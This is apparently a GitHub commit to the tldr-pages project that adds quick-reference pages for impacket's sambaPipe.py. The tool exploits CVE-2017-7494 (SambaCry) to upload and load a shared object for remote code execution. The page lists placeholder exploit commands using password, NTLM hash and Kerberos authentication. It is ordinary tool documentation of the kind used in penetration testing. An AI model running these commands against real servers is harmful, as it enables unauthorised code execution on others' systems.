1
0
Fork 0
mirror of https://github.com/tldr-pages/tldr.git synced 2025-08-24 23:44:03 +02:00

sambaPipe.py, impacket-sambaPipe: add page (#17728)

* sambaPipe.py, impacket-sambaPipe: add page

* Fix

* :o

* 1

* 2
This commit is contained in:
Machiavelli 2025-08-22 06:24:30 +03:00 committed by GitHub
parent 06f710036c
commit 950791e1a2
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
2 changed files with 31 additions and 0 deletions

View file

@ -0,0 +1,7 @@
# impacket-sambaPipe
> This command is an alias of `sambaPipe.py`.
- View documentation for the original command:
`tldr sambaPipe.py`

View file

@ -0,0 +1,24 @@
# sambaPipe.py
> Exploit CVE-2017-7494 (SambaCry) to upload and load a shared object (SO) file on a vulnerable Samba server for remote code execution.
> More information: <https://github.com/fortra/impacket>.
- Upload and load a shared object file on a vulnerable Samba server:
`sambaPipe.py -so {{path/to/file.so}} {{domain}}/{{username}}:{{password}}@{{target}}`
- Authenticate using NTLM hashes instead of a password:
`sambaPipe.py -so {{path/to/file.so}} -hashes {{LM_HASH:NT_HASH}} {{domain}}/{{username}}:{{password}}@{{target}}`
- Use Kerberos authentication for the target:
`sambaPipe.py -so {{path/to/file.so}} -k -no-pass {{domain}}/{{username}}:{{password}}@{{target}}`
- Specify a domain controller IP for authentication:
`sambaPipe.py -so {{path/to/file.so}} -dc-ip {{dc_ip}} {{domain}}/{{username}}:{{password}}@{{target}}`
- Use a custom port for the SMB connection:
`sambaPipe.py -so {{path/to/file.so}} -port {{port}} {{domain}}/{{username}}:{{password}}@{{target}}`